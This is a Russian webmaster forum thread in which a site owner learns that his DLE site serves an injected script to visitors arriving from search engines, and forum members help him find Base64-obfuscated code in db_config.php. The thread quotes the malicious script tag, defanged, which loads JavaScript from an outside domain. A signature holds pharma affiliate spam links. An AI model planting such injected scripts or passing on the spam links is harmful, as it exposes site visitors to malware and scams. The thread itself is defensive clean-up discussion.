Яндекс видит вирус на сайте, которого нет!

12 3
Антон
На сайте с 09.01.2007
Offline
148
4991

Уважаемые.

Вроде не первый день в этой сфере, но я ничего не понимаю!

В Я.Вебмастере мне пишется, что на сайте двдрипер.ру есть вирус. Я его там не нашел, заказал перепроверку, все равно видит вирус. Я написал в саппорт, в ответ получил следующее сообщение:

При посещении Вашего сайта антивирусный робот Яндекса обнаружил вредоносный код следующего содержания:

[script language="JavaScript" charset="windows-1251" rel="nofollow" src="h**p://maroder.info/js/if.php?id=1548"][/script]

Звездочки в ссылке вставлены во избежание случайного перехода, скобки в тегах изменены во избежание случайного срабатывания кода.

Данный код появляется в первой строке любой страницы сайта, перед открывающим тегом html.

Пожалуйста, проверьте файлы Вашего сайта на предмет заражения.

Я не нашел ни на одной странице подобного кода. Заказав еще одну перепроверку - снова указывает на вирус.

Помогите разобраться, теряю посетителей. То же самое есть еще на одном сайте.

Mishatko
На сайте с 25.10.2008
Offline
74
#1

При переходе с ПС иногда данная строчка появляется в самом начале страницы.

Это присходит только когда значение рефера указывает на переход с ПС.

При прямом заходе на сайт "вредоносный код" не появляется. Всё указывает на то, что сайт заражён. Ну и на всякий случай тыц.

100% СДЛ (http://www.tsya.ru/)
Arhivator-007
На сайте с 11.02.2010
Offline
39
#2

Если у Вас есть на сайте форум, то скорее всего там - в файлах шаблонах сборки страниц. Если же нет, то надо вручную все смотреть - каждую страницу. А так - сочувствую. Сам один раз вот так же как и Вы на сайте партнера искал подобное ...

"псевдо" оптимизаторы теоретики, могут идти ---> лесом! :)))))
nik_kent
На сайте с 05.02.2008
Offline
193
#3

А я код вижу. Может злодеи Вашему IP его не отдают? Может зайти через анонимайзер?

[ATTACH]85721[/ATTACH]

И кстати, да, при прямом заходе на сайт его нет.

jpg dvdriper.jpg
С уважением, Николай.
F
На сайте с 16.01.2010
Offline
267
#4

Проверьте наличие новых картинок в папках с шаблонами.

А ещё он может быть зашифрован в Base64 и стоять на видном месте в шаблоне, но стандартными средствами вы этот код не увидите.

Gargonit
На сайте с 24.02.2010
Offline
44
#5

Ловил этот самый вирус, он появляется при открывании страницы в самом вверху над основным кодом.

В файлах я его не нашел, проверил все что можно, он как-то генерировался скриптом, не понятно откуда. Смог убрать обновлением всех файлов.

Залили его через Шел в cms DLE. 😡

E
На сайте с 28.06.2008
Offline
114
#6

нужно смотреть шаблон и файлы которые инклудяться в нем

Антон
На сайте с 09.01.2007
Offline
148
#7

Блин, значит все таки и правда вирус есть. Пошел рыть файлы! Спасибо!

mr.Cent добавил 11.03.2011 в 12:52

Кажись убрал! Может кто посмотреть, появляется ли код? Я просто его и раньше не видел...

nik_kent
На сайте с 05.02.2008
Offline
193
#8
mr.Cent:
Кажись убрал! Может кто посмотреть, появляется ли код?

У меня нет кода теперь.

Антон
На сайте с 09.01.2007
Offline
148
#9

На будущее. У кого движки DLE. Злоумышленники прописали закодированный по Base64 код в файле /egine/data/db_config.php. Не пойму где дыра пока, стоит лицензионный 9.2. Будем искать. Спасибо всем за наводку. :)

dino_spomoni
На сайте с 09.06.2007
Offline
633
#10

Дыра может быть не в самом движке, а в базе, в фтп, еще много где. Я думаю вы уже сменили все пароли, которые только возможно, если нет, сделайте это немедленно.

#1 ФАРМ партнёрка, API, 80%+ АПРУВ! Мега крутой конверт, льем всю фарму! -> https://bit.ly/3EvLxX8 | Профи в фарме? Тебе в Union Pharm! -> https://u.to/aXwsIg | PharmEmpire - ТОП Конверт фарма трафика!!! -> https://clck.ru/QrgKx | Рассылки цифровых сообщений и на WhatsApp! -> https://bit.ly/3FVSDYb
12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий